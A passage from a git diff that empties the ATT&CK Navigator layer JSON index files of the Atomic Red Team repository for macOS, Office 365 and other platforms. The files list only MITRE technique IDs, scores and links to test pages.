Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index a869ee3d..8b137891 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json 
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1124","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]}]} \ No newline at end of file + diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json index 964bc447..e69de29b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json @@ -1 +0,0 @@ -{"version":"4.3","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 0a8439f4..e69de29b 100644 --- 